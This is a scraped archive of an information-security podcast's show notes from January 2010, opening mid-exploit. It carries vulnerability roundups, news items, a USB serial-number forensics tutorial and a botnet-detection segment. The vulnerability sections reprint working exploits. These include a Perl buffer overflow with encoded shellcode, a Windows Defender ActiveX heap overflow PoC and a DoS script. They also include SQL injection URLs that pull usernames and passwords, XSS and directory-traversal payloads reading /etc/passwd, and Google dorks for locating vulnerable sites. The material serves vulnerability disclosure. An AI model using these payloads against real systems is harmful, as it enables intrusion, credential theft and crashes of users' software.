“x58x4fx68x6bx4ex6dx5ax46x6ex72x77x6bx4fx78x67x63″.
“x53x62x41x30x6cx55x33x64x6ex42x45x70x78x32x45x33″.
“x30x47″;

open(myfile,’>> Neo_Crash.m3u’);
print myfile $noa.$jmp.$seh.$nob.$payload;
Microsoft Windows 7 Defender is subject to an Active-X heap overflow vulnerability. Exploit code is available:
#Aouther : [SarBoT511]
#Exploits title :[Microsoft Windows Defender ActiveX Heap Overflow PoC]
#downloads :[www.microsoft.com]
#Date : [2010/01/19]
#tested on :[windows 7]
#Microsoft Windows Defender

<html>
<object classid=’clsid:07DD3249-A591-4949-8F20-09CD347C69DC’ id=’target’
></object>
<script language=’vbscript’>
targetFile = “C:Program FilesWindows DefenderMsMpCom.dll”
prototype = “Sub WriteValue ( ByVal bstrKeyName As String , ByVal
bstrValueName As String , ByVal eType As _MP_COM_CONFIG_TYPE , ByVal
varValue As Variant )”
memberName = “WriteValue”
progid = “MpComExportsLib.MsMpSimpleConfig”
argCount = 4

arg1=String(6164, “A”)
arg2=”defaultV”
arg3=1
arg4=”defaultV”

target.WriteValue arg1 ,arg2 ,arg3 ,arg4
</script>

News Items of Interest:

News item 1: http://www.darkreading.com/vulnerability_management/security/privacy/showArticle.jhtml?articleID=222301034&cid=RSSfeed

Microsoft released a patch today for the Internet Explorer CVE-2010-0249 Remote Code Execution Vulnerability.

News item 2: http://staging.arbornetworks.com/dmdocuments/ISR2009_EN.pdf

Arbor has released their 2009 Worldwide Infrastructure Security Report and it is an interesting read. The largest DDoS increased nearly 5-fold from 2004 to 2008 (and doubled from 2006 to 2008) to 49Gbps. At that size, we would definitely need the assistance of our upstream service provider to mitigate. The report also shows the continuing trend of not reporting/referring attacks to law enforcement.
News item 3: http://www.nvdaily.com/news/2010/01/hacker-redirects-traffic-from-library.php
A hacker redirected visitors to the Shenandoah County Library’s Web site Tuesday morning to advertising sites mostly geared toward the erectile dysfunction drug Cialis.

News item 4: http://www.infoworld.com/d/networking/skype-video-goes-multipoint-vivu-plug-in-696?source=rss_infoworld_news

Startup ViVu has released a software plug-in for Skype that allows the popular Internet calling service to be used for multipoint videoconferencing.

Skype can already be used to make voice calls between more than two parties, but the lack of multipoint video has been seen by some as its biggest shortcoming. The company said recently that one third of all Skype-to-Skype calls now include video.

Technical Segment: http://www.irongeek.com/i.php?page=security/tracking-users-malware-and-data-leaks-via-the-usb-serial-numbers-on-flash-drives-smart-phones-and-mp3-players

Tracking users, malware and data leaks via the USB serial numbers on flash drives, smart phones and MP3 players
I don’t write on the forensics side of security much, but I thought this was an interesting topic that I’d not seen covered much before. While I was doing my research on USB hardware key loggers I learned quite a bit about USB devices that I did not know before. Besides Vendor IDs and Product IDs, some devices also have a serial number associated with them. The “Serial Number Descriptor” string is optional, but a fair number of devices such as thumb drives, removable USB hard drives, PDAs and cell phones have them. This started me thinking: How could this data be used in a security or forensics context? I can think of a few scenarios off the top of my head:

Ω A USB flash drive is found with contraband on it, but none of the suspects claim to own it. If the serial number of the USB flash drive is found in one of suspects’ Windows registry this is possible evidence as to who it belongs to.

Ω Malware has been spreading though your network, and you think thumb drives are the vector. Using the serial number you could search the network for computers where a known infected drive was used to give you an idea as to which workstations you will have to do clean up on. It may also lead you to know who brought the malware into the network (Patient Zero), or who been the biggest Typhoid Mary.

Ω You suspect some data has been stolen from a department server, and you found a suspicious MP3 player’s serial number in the Windows server’s registry. MP3 players can be used as generic storage devices. By searching the network for other boxes where that same MP3 player has been plugged-in you may find that the only other box it’s ever been use on is Bob’s. This makes Bob a likely suspect.

I’m guessing you could come up with other scenarios where tracking a USB device’s serial number could be useful. We can see the potential, but how do we get this data, and how do we automate using it? There are two main spots you can pull this information from on a Windows XP/Vista/7 system:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR

I cover both of these registry keys in more detail in my article ‘Forensically interesting spots in the Windows 7, Vista and XP file system and registry’ which you can find here:

http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots

Looking at these registry values directly is kind of cumbersome. A nicer way to look at this data is with NirSoft’s freeware tool USBDeview which you can download from:

http://www.nirsoft.net/utils/usb_devices_view.html

USBDeView gives the user a ton of information about what devices are currently plugged-in, and what ones have been plugged-in before but are not currently present.

Ok, now we know where on a Windows box this information is stored, but is there an automated way to find it and search our network for other locations where the same USB device has been used? Some organizations may have an asset tracking database that would be searchable for this information, but many of us don’t have such a system in place. I was thinking of coding up something for the task, but I’m quite lazy. Then I remembered that most of Nir’s tools have the ability to be used from across the network. Sure enough, USBDeview also had this option, all I had to do to connect to a remote Windows box and look though its registry for USB devices was to issue this simple command:

USBDeview /remote \\SomeComputer

Now keep in mind, I had to be logged in with an account that had access to that machine, and certain services have to be accessible. Nir has a nice blog post on what it takes for his tools to work from across the network:

http://blog.nirsoft.net/2009/10/22/how-to-connect-a-remote-windows-7vistaxp-computer-with-nirsoft-utilities/

That solves the problem of dumping information from one machine, but what about a whole network? Well, it seems USBDview has an option for taking a list of machines from a text file and grabbing the USB device list from all of them. The syntax is pretty simple:

USBDeview /remotefile boxes.txt

where boxes.txt is a list of computer names/IPs in UNC format. For example:

\\192.168.1.13
\\192.168.1.14
\\skynet
\\cthulhu

It takes a bit of time for the results to return, so be patient. Once we get the report, we can sort by the ‘Serial Number’ field, look for repeating serial number by eye, and then scroll over to the ‘Computer Name’ field to see what computers that particular USB device has been used on. For my screen shots I’ve reordered the columns to put the fields I’m most interested in first. The ‘Created Date’ and ‘Last Plug/Unplug Date’ fields are also usefully for figuring out a time line (really handy for finding a malware Patient Zero or Typhoid Mary based on when a user was logged on last). As you can see from the first screen shot, I have two different thumb drives from Patriot Memory that have been plugged into both my Skynet and Cthulhu workstations, but none of the other boxes I scanned:

From the 2nd screen shot you can see that my IronKey and my former roommate’s Android Phone have only ever been plugged into my workstation named Cthulhu:

This sort of information can be erased, but local attackers rarely think of the tracks that their USB devices leave behind. I cover erasing USB track in more detail in the anti-forensics video which I will link to at the end of this article.

Now you may be thinking: sorting and looking though the table for matching USB serial numbers by hand may be fine for when you only have four workstations, but what if you have a lot more? Luckily, Nir implemented the ability to save his tool’s output to many different file formats, including CSV (Comma Separated Values). Pretty much any database tool (MS Access for example) can import a CSV file, and from there you are just a few SQL queries away from finding the devices you are seeking. For example, if I wanted to look though the output for just the serial number 07850DA305FC an SQL query similar to this one may help:

SELECT Myoutput.*
FROM Myoutput WHERE Myoutput.[serial] = ’07850DA305FC’ ;

To dump your findings to a CSV you could take the results from the GUI, select all of the records (Ctrl-A), then choose the save icon and pick CSV from the drop down, but there is an easier way if you just intent to import the results into a database for sorting and searching. You can tell USBDeview to dump the output to a file without ever bringing up the GUI with this simple command:

USBDeview /remotefile boxes.txt /scomma myoutput.csv

With a little automation you could make regular reports. I’m still interested in finding better ways to track this sort of information, so if you know of any good free or open source asset management systems that log USB serial numbers, or are interested in coding something to help automate these types of searches, please let me know.

If you’re interested in just covering your tracks when it comes to USB serial numbers, check out my anti-forensics video:

http://www.irongeek.com/i.php?page=videos/anti-forensics-occult-computing

it’s about three hours and seven minutes long, but covers a lot more than just USB devices. I hope you have enjoyed the article, and feel free to follow me on Twitter @Irongeek_ADC .

Links at a glance:

USBDeview
http://www.nirsoft.net/utils/usb_devices_view.html

What it takes for Nir’s tools to work from across the network
http://blog.nirsoft.net/2009/10/22/how-to-connect-a-remote-windows-7vistaxp-computer-with-nirsoft-utilities/

Forensically interesting spots in the Windows 7, Vista and XP file system and registry
http://www.irongeek.com/i.php?page=security/windows-forensics-registry-and-file-system-spots

Anti-Forensics video
http://www.irongeek.com/i.php?page=videos/anti-forensics-occult-computing

Update: To have the tool work on Windows 7 you will need to enable the Remote Registry Service as it is set to manual by default.

2010
01.20

Episode 50 – Scott “My Drive is Hard” Moulton Interview

Category: Podcast / Tags: no tag / Add Comment

InfoSec Daily Podcast

InfoSec Podcast Episode 50 for January 20, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

Go online to register by going to the SANS website or call (301) 654-SANS(7267).

SANS 2010 Orlando, Fl. March 6 – 15, 2010 (http://www.sans.org/sans-2010/)

We would like to welcome Scott Moulton for our podcast. Scott is the president of Forensic Strategy Services, LLC and also owns a data recovery company called MyHardDriveDied.com. He is well known for his presentations at Shmoocon and Defcon. His videos can be seen on youtube.com as well as his SANS course that he personally developed.

For more information on SANS SEC606 go here. Scott’s presentations can be found here and here.

2010
01.19

Episode 49 – Dorking Away

Category: Podcast / Tags: no tag / Add Comment

InfoSec Daily Podcast

InfoSec Podcast Episode 49 for January 19, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Sponsors: This podcast is sponsored in part by Webspeedway, your Virtual IT Department. When your systems are down, as a small and medium-sized businesses the resulting downtime can have a devastating impact.

Webspeedway specializes in providing proactive solutions to mitigate the risks of downtime, data loss, e-mail viruses and the many other threats to your business systems. Webspeedway provides the services of a Fortune 500 IT department, including 24 x 7 monitoring and on-site support, all at a fraction of the cost of even one employee.

Goto www.webspeedway.com today to learn about their cost-effective IT management solutions for your business.

Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

Go online to register by going to the SANS website or call (301) 654-SANS(7267).

SANS 2010 Orlando, Fl. March 6 – 15, 2010 (http://www.sans.org/sans-2010/)

Vulnerabilities of Interest:

VaroCMS Community Voting Web is subject to a cross site scripting and open redirection vulnerability. Version 2.0 is impacted, though others may be vulnerable. Exploit Code is available:
Cross Site Scripting

http://www.varocms.com/demo/search?q=[XSS]

Open Redirection

http://varocms.com/demo/login?return=[URL]

http://blog.varocms.com/demo/register?return=[URL]

http://www.varocms.com/demo/resize/1024?return=[URL]

http://www.varocms.com/demo/resize/1280?return=[URL]

http://www.varocms.com/demo/resize/1600?return=[URL]

http://www.varocms.com/demo/resize/1920?return=[URL]
The Joomla Prime component is subject to a directory traversal vulnerability. Example URL: http://www.sample.com/index.php?option=com_prime&lang=../../../../../../../../../../etc/passwd%00. Google Dork: inurl:”index.php?option=com_prime”
Audiotran is subject to a direct RET buffer overflow exploit. Version 1.4.1 is affected, though others may be vulnerable. Exploit code is available:
# Exploit Title: Audiotran v1.4.1 direct RET BOF
# Date: 2010-1-16
# Author: Jacky
# Software Link: http://www.e-soft.co.uk/Audiotran.htm
# Version: 1.4.1
# Tested on: Windows XP SP2
# CVE : [if exists]
# Code :
#Audiotran v1.4.1 Direct RET local BOF Vulnerability.
#Exploit Discovered by SÃ©bastien Duquette (Greetz to him
)
#Written and coded by Jacky
#All Greetz to Corelan team !
#I saw this exploit written in python with SEH method !
#When i tested it i saw that it could be exploited by a Direct RET Address
!
my $file=”Crash.pls”;
my $junk=”A”x1324;
my $eip=pack(‘V’,0x77D8AED0); #JMP ESP from USER32.DLL!
my $presc=”SEXY”;
my $sc=”x90″x50;
$sc=$sc.”xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49″.
“x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36″.
“x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34″.
“x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41″.
“x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54″.
“x42x50x42x50x42x30x4bx38x45x44x4ex43x4bx58x4ex57″.
“x45x50x4ax37x41x50x4fx4ex4bx38x4fx44x4ax31x4bx38″.
“x4fx55x42x32x41x30x4bx4ex49x34x4bx58x46x43x4bx58″.
“x41x50x50x4ex41x53x42x4cx49x49x4ex4ax46x38x42x4c”.
“x46x47x47x30x41x4cx4cx4cx4dx50x41x30x44x4cx4bx4e”.
“x46x4fx4bx43x46x55x46x52x46x50x45x47x45x4ex4bx58″.
“x4fx35x46x42x41x50x4bx4ex48x36x4bx58x4ex30x4bx34″.
“x4bx48x4fx35x4ex51x41x30x4bx4ex4bx38x4ex31x4bx48″.
“x41x30x4bx4ex49x38x4ex35x46x32x46x50x43x4cx41x33″.
“x42x4cx46x36x4bx48x42x54x42x33x45x38x42x4cx4ax57″.
“x4ex50x4bx48x42x54x4ex30x4bx38x42x57x4ex41x4dx4a”.
“x4bx48x4ax46x4ax30x4bx4ex49x50x4bx58x42x48x42x4b”.
“x42x50x42x30x42x30x4bx38x4ax36x4ex53x4fx35x41x43″.
“x48x4fx42x46x48x55x49x48x4ax4fx43x58x42x4cx4bx57″.
“x42x35x4ax36x42x4fx4cx58x46x50x4fx55x4ax46x4ax49″.
“x50x4fx4cx58x50x50x47x35x4fx4fx47x4ex43x46x41x46″.
“x4ex46x43x36x42x30x5a”;
open(INI,”>$file”);
print “[+]Creating Malicious Playlist File!n”;
print INI $junk.$eip.$presc.$sc;
print “[+]File Created!n”;
print “[+]Real Author of the vulnerability is Sebastien
Duquette!n”
print “[+]All Rights are reserved to him !n”;
print “[+]Coded by Jacky!n”;
close(INI);
phpMySport is subject to a SQL injection and file manager access vulnerability. Version 1.4 is impacted, while other versions may be vulnerable. Access to File manager is unprotected and by using dot-dot-slash (/../../), it is possible to view directory structure of the target system. Google Dork: inurl:”phpmysport/index.php?” Example URLs are available:
http://www.sample.com/phpmysport/index.php?r=member&v1=view&v2=’+AND+1=2

+UNION+ALL+SELECT+1,2,3,4,5,concat(member_login,0x3a,member_pass),7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22,23+from+pms_member–+-

http://www.sample.com/phpmysport/index.php?r=news&v1=’+AND+1=2+UNION+ALL+SEL

ECT+1,2,3,4,5,6,concat(member_login,0x3a,member_pass),8,9,10,11,12,13,14,15
,16,17+from+pms_member–+-

http://www.sample.com/phpmysport/index.php?r=information&v1=’+AND+1=2+UNION+

ALL+SELECT+1,2,3,4,5,6,7,concat(member_login,0x3a,member_pass),9,10,11,12,1
3,14,15,16,17,18,19+from+pms_member–+-

http://www.sample.com/phpmysport/index.php?r=team&v1=view&v2=’+AND+1=2+U

NION+ALL+SELECT+1,2,3,4,concat(member_login,0x3a,member_pass),6,7,8+from+pm
s_member–+-

http://www.sample.com/phpmysport/index.php?r=club&v1=view&v2=’+AND+1=2+U

NION+ALL+SELECT+1,2,3,concat(member_login,0x3a,member_pass),5,6,7,8,9,10,11
,12,13,14+from+pms_member–+-

http://www.sample.com/phpmysport/index.php?r=matches&v1=view&v2=’+AND+1=

2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(memb
er_login,0x3a,member_pass),20,21,22,23,24,25,26,27,28+from+pms_member–+-

Access to File manager:

http://www.sample.com/phpmysport/index.php?r=file&v1=file_manager&curren

t_folder=/../../../&fen=pop
Gallerie Hitmaaan is subject to a cross site scripting vulnerability. Version 1.3 is impacted, while other versions may be vulnerable. Example URLs:
http://www.sample.com/1367_hitmaaan-13/?gall=fonds&levela=>”><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>

http://www.sample.com/1367_hitmaaan-13/?gall=<img+src=http://www.sample.com/Utilisateur.gif+onload=alert(213771818860)>levela=email@email.com&num_page=1
Thelia is subject to a cross site scripting vulnerability. Version 1.4.2.1 is impacted, while other versions may be vulnerable. Example URLs: http://www.sample.com/panier.php?action=ajouter&ref=[XSS]
http://www.sample.com/panier.php?action=ajouter&ref=”>
MediaMonkey Player is subject to a Denial of Service vulnerability. Version 3.2.0 is impacted, while other verisons may be vulnerable. Exploit code:
# Exploit Title: MediaMonkey Player Local Denial of Service (DoS)
# Download :

http://download.cnet.com/MediaMonkey-Standard/3000-2141_4-10109807.html

# Date: 16/01/2010
# Author: Red-D3v1L
## sh0otz fly t0 : j0rd4n14n.r1z,H1s0k4,ThE-g0bl!N,T3rr0rist,zAx,dr@g,h311
c0d3 And All sEc-r1z CrEw#
# n00bz : Zombie_KSA g0t 0wn3d hehehe n00b pakbugs zf0 …
# Version: 3.2.0
# my Home : www.sec-r1z.com , sEc-r1z CrEw#
#!/usr/bin/perl
system (“color a”);
print “./SEC-R1Z_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
_n”;
print ” / / _ _ \ / __ _ / _ _ /\ < |/_ _ _ _
/n”;
print ” \ \ _ _\__ / /_ _ / / __ | () / | | /
/n”;
print ” \ __ _ \ / /_ _ / / |__| | / | | / /n”;
print ” _ _ _ _ \/ / /2_0_1_0 | \ | | / /_____
n”;
print ” /_ _ _ _ / _ _ _ / _ _ _ / |__| __ |__| /___\/J0_
_____./str1k3z y0u!!n”;
###################################
my $r1z= “b00m.mp3″;
my $boom=”x41″ x 5000;
open(myfile,’>>b00m.mp3′);
print myfile $boom;
print “[+] d0nEn”;

News Items of Interest:

News item 1::http://www.securitypark.co.uk/security_article264196.html

According to a Check Point global customer survey of businesses on endpoint security trends, the number of remote workers continues to grow and businesses need to expand their IT measures to safeguard the increasing mobile workforce.

Over 40% of businesses in the last year have more remote users connecting to the corporate network from home or when travelling, compared to 2008. Check Point discovered the clear majority (77%) of businesses have up to a quarter of their total workforce consisting of regular remote users.

News item 2: http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3210284

According to Akamai Technologies, variants of the Conficker worm were still active and spreading during the third quarter, accounting for much of attack traffic on the internet. Although mainstream and industry media coverage of the Conficker worm and its variants has dropped significantly since peaking in the second quarter, it is clear from this data that the worm (and its variants) is apparently still quite active, searching out new systems to infect.

During the third quarter, 78 percent of internet attacks observed by Akamai targeted port 445, up from 68 percent during the previous quarter. Port 445, which is used by Microsoft Directory Services, is the same port that Conficker targets, aiming to exploit a buffer overflow vulnerability in Windows and infect the targeted computer.

Most attacks originated from Russia and Brazil.

News item 3: http://www.theregister.co.uk/2010/01/18/jc_defaced/

The Jewish Chronicle website was defaced over the weekend by hackers calling themselves the “Palestinian Mujaheeds” who posted a rant against Israel’s blockade of the Gaza Strip. Hackers posted an image of the Palestinian flag alongside diatribes against Israeli security policy in both English and Turkish. The hacked front page of the site (www.thejc.com) also attempted to play an MP3 file, net security firm Sophos reports.

News item 4:http://www.thetechherald.com/article.php/201002/5090/SCNB-hit-by-breach—over-8-000-clear-text-credentials-stolen

An internal audit by Suffolk County National Bank (SCNB) discovered that over 8,000 customer online banking credentials were snatched from a server where they resided in plain text. Suffolk Bancorp said that the 8,378 records accounted for less than ten percent of their customer base at SCNB, but failed to explain the reasoning for leaving such information on a server in the clear.

News item 5: http://www.symantec.com/connect/blogs/drop-cn-spam

Symantec recently reported that the volume of URL spam from domains registered in China has decreased from ~40% of overall spam in December to ~20%. The drop is likely due to the recent enhancement in domain registration procedures introduced by China’s Internet Network Information Center (CNNIC). Chinese .CN domains are mostly exploited by Canadian Pharmacy spammers to host online pharmaceutical spam sites.

News item 6: http://www.sleuthkit.org/autopsy/download.php and http://www.sleuthkit.org/sleuthkit/history.php

Autopsy 2.22 and Sleuthkit 3.1.0 updates have been released.

News item 7: http://www.webpronews.com/topnews/2010/01/18/baidu-ctos-resignation-announced

It appears that not all is well (or at least normal) at Baidu. Last week, the company’s COO abruptly resigned, and today, its CTO followed suit. Both men cited “personal reasons” for their departures, and Baidu’s made little other information available.

Either exit might have been considered unremarkable on its own. The COO, Peng Ye, left before Google made its big statement about China, and also before hackers attacked Baidu, so “personal reasons” sounded like a semi-plausible explanation.

News item 8: http://globalist.org.ua/eng/144708-forbes%E2%80%99-top-10-most-advantageous-and-disadvantageous-professions-in-the-usa#more-708

Forbes magazine has defined the TOP-10 the most advantageous and disadvantageous professions for the Americans in 2010. This forecast has been formed by using researches of the recruitment site Career Cast. The authors based on wishing salary, labor market demand, the comfort of working place and level of stress.

On the top of the list is actuary, the specialist occupied with counting damages and compensations for the insurance and social companies. It is very actually during crisis time. Such specialist is guaranteed to have more than $85 000 per year with minimal stress.

The same salary is guaranteed also for the software engineer, including high perspective of employment. It is undoubtedly the second position.

News item 9:http://www.computerweekly.com/Articles/2010/01/14/239966/A-fifth-of-IT-to-disappear-by-2012.htm
Gartner has painted a bleak future for corporate IT in its latest predictions. The analyst company expects that by 2012, 20% of businesses will own no IT assets. Gartner predicted that trends in virtualization, cloud-enabled services, and employees running personal desktops and notebook systems on corporate networks, would lower the amount of IT hardware businesses own.

If the ownership of hardware shifts to third parties, Gartner expected there would be major shifts throughout every facet of the IT hardware industry. This could mean that enterprise IT budgets would either be shrunk or reallocated to more-strategic projects and enterprise IT staff would either be reduced or reskilled to meet new requirements.

News item 10: http://www.technewsworld.com/story/69130.html
Google is reportedly looking into the possibility that one or more staff members at its office in China helped enable the attack on its infrastructure in mid-December.

After the attack was discovered, some Google China employees were denied access to internal networks, while others were put on leave, and still others were sent off to offices elsewhere in the Internet search giant’s Asia-Pacific operations, according to a Reuters report.

News item 11: http://seclists.org/fulldisclosure/2010/Jan/341

2010
01.18

Episode 48 – More Cowbell

Category: Podcast / Tags: no tag / Add Comment

InfoSec Daily Podcast

InfoSec Podcast Episode 48 for January 18, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Goto www.webspeedway.com today to learn about their cost-effective IT management solutions for your business.

Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

SEC-502: Perimeter Protection In-Depth   2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems   3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression   4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth   5/17/10 to 5/21/10

Go online to register by going to the SANS website or call (301) 654-SANS(7267).

SANS 2010 Orlando, Fl. March 6 – 15, 2010 (http://www.sans.org/sans-2010/)

Vulnerabilities of Interest:

Apple iTunes and QuickTime are subject to a buffer-overflow vulnerability because the applications fail to bounds-check user-supplied data before copying it into an insufficiently sized buffer. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. This issue affects iTunes 8.0.2.20 through 9.0.1.8 and QuickTime 7.3.4 through QuickTime X. Additional versions or applications that rely on the QuickTime library may also be affected. PoCs are available.
Google SketchUp is subject to a remote memory corruption vulnerability because the application fails to perform adequate boundary checks on user-supplied input. Attackers may exploit this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. Google SketchUp 7.0.10247, 7.1.4871, and 7.1.6087 are vulnerable; other versions may also be affected. PoCs are available.
MySQL is subject to a local privilege-escalation vulnerability. Local attackers can exploit this issue to gain elevated privileges on the affected computer. Versions prior to MySQL 5.1.41 are vulnerable. MySQL is subject to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions. An attacker can exploit these issues to crash the application, denying access to legitimate users. Versions prior to MySQL 5.0.88 and 5.1.41 are vulnerable. Example queries are available.
Internet Explorer is subject to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the browser. Successful exploits will compromise the application and possibly the computer. Failed attacks will cause denial-of-service conditions. This issue is being actively exploited in the wild in targeted attacks. A Metasploit exploit module is available.
Ots Labs OtsTurntables is subject to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input. Attackers may be able to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. OtsTurntables 1.00.027 and 1.00.047 are vulnerable; other versions may also be affected. Exploits are available in the wild.
Microsoft Windows is subject to a remote code-execution vulnerability that affects the Embedded OpenType font engine. An attacker can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Successful exploits may aid in the compromise of affected computers. Failed attempts may trigger a denial-of-service condition. A commercial proof of concept is available through VUPEN Security – Exploit and PoCs Service. This proof of concept is not otherwise publicly available or known to be circulating in the wild.
Rockwell Automation is addressing these potential security issues. The affected software packages are 1761-Lxxxxx, 1762-Lxxxxx, 1763-Lxxxxx, 1764-Lxxxxx, and 1766-Lxxxxx. The following are recommended mitigation strategies Restrict physical and electronic (network) access to the MicroLogix product allowing only authorized users as well as changing the product’s password periodically and frequently and do not reuse old passwords.

News Items of Interest:

News item 1: http://www.darkreading.com/vulnerability_management/security/privacy/showArticle.jhtml?articleID=222301034&cid=RSSfeed

Lincoln National Corp. (LNC) last week disclosed a security vulnerability in its portfolio information system that could have compromised the account data of approximately 1.2 million customers.

In a disclosure letter (PDF) sent to the attorney general of New Hampshire Jan. 4, attorneys for the financial services firm revealed that a breach of the Lincoln portfolio information system had been reported to the Financial Industry Regulatory Authority (FINRA) by an unidentified source last August. The company was planning to issue notification to the affected customers on Jan. 6, the letter says.

News item 2: http://www.v3.co.uk/v3/news/2256195/sap-backs-increased-support

SAP has announced that it is changing its plans to shift all customers to a single service contract and has unveiled a tiered system that reduces customer costs.The company provoked a storm when it decided to shift all customers onto its pricey Enterprise Support package, so much so that last month it put the plans on hold until a review could be conducted. The new scheme announced today will create a Standard Support package priced at 18 per cent of the software licence base, compared to 22 per cent for the Enterprise package. The vendor is also to cancel proposed price increases for this year.

News item 3: http://www.fbi.gov/pressrel/pressrel10/earthquake011310.htm
The FBI today reminds Internet users who receive appeals to donate money in the aftermath of Tuesday’s earthquake in Haiti to apply a critical eye and do their due diligence before responding to those requests. Read the guidelines.

News item 4: http://news.techworld.com/security/3210307/cisco-asa-doesnt-support-internet-explorer-8/?olo=rss

It may be March before Cisco’s ASA security appliances support the latest version of Microsoft’s web browser, limiting what applications businesses can access over their SSL VPN connections. Incompatibility with Microsoft’s Internet Explorer 8 means one of the ASA’s SSL VPN options won’t work until then, leaving a second option that only supports applications with web interfaces or those that can be readily made web compliant.

News item 5: Here is a list of FBI or private designations for wide spread Chinese attacks on US corporations.

Moonlight Maze – 1999

Titan Rain – 2003 – 2005

GhostNet – March 2009

Operation “Aurora” – December 2009

News item 6: http://www.washingtonpost.com/wp-dyn/content/article/2010/01/13/AR2010011300359.html

Juniper Networks and Symantec said Thursday that they were investigating a widespread cyber-espionage incident that has hit dozens of technology companies, including Google and Adobe.

Sources familiar with the situation say that 34 companies, most of them large Fortune 500 names, were hit by a sophisticated cyber-attack, first uncovered by Google last month. The attackers used a previously unknown “zero-day” attack on Internet Explorer, and possibly other techniques, to break into company networks and steal sensitive information.

The Washington Post reports that Yahoo, Dow Chemical and Northrop Grumman were also attacked. Juniper and Symantec both acknowledged that they were investigating incidents, but stopped short of saying they had been hacked or of providing any details.
Technical Segment:

http://www.cisco.com/en/US/solutions/collateral/ns340/ns394/ns171/ns441/networking_solutions_whitepaper0900aecd8072a537.html

Are there Botnet controlled hosts on your network? Are your hosts infected with malware or spyware that is trying to “phone-home”? How would you know? One way to find out is to employ Cisco ASA’s new Layer 4 Traffic Monitoring (L4TM) feature. L4TM detects infected clients by tracking rogue “phone-home” traffic.
The Cisco ASA Layer 4 Traffic Monitor feature is designed to detect command and control and data upload traffic from bots, malware, and spyware flowing through the ASA back to their “HQ”. To make this detection possible using a ASA, Cisco leveraged technology already present in its Ironport Web Security Appliance (WSA) product. Let’s look at how Botnet infection typically happens and how Cisco ASA’s new feature can help detect it.

Botnet Infection Process:
1) Client somehow gets infected with malware, spyware or other Botnet like exploit. By an large these infections happen via websites or email.
2) Infected clients then communicate with a command and control site(s) on the Internet.
3) Depending on the type of exploit it will then launch some type of attack. Common examples are Denial of Service Attack, Spam relaying, Adware infection, Identity theft, keyboard logging, data theft, click fraud, upload of confidential data, reconnaissance, an many others. The commonality is that all of these will need to talk back to their “mothership” in some manner to be worth anything to the hacker.

Layer 4 Traffic Monitor Botnet detection process:
1) Cisco ASA is configured to retrieve and install the Cisco Botnet database from Ironport.com. The ASA will then dynamically check every 60 minutes for updates to the Botnet database.
2) ASA L4TM feature compares the destination addresses flowing through its interfaces with those in its Botnet database. It is looking for matches which would indicate the destination IP is malicious.
3) When a match is encountered an alert will be sent to ASDM and syslog with the details of the source IP and malicious destination IP.

Episode 57 – HDD Phasers

Episode 56 – Barcode Fun

Episode 55 – Taint Garden

Episode 54 – Meat Detonation

Episode 53 – Who Ownz an Exploit?

Episode 52 – Mood Swing

Episode 51 – USB Tomfoolery

Episode 50 – Scott “My Drive is Hard” Moulton Interview

Episode 49 – Dorking Away

Episode 48 – More Cowbell

Archives

Conferences

Forensics

General

Information Security

Podcasters

Training

January 2010
S	M	T	W	T	F	S
« Dec				Feb »
					1	2
3	4	5	6	7	8	9
10	11	12	13	14	15	16
17	18	19	20	21	22	23
24	25	26	27	28	29	30
31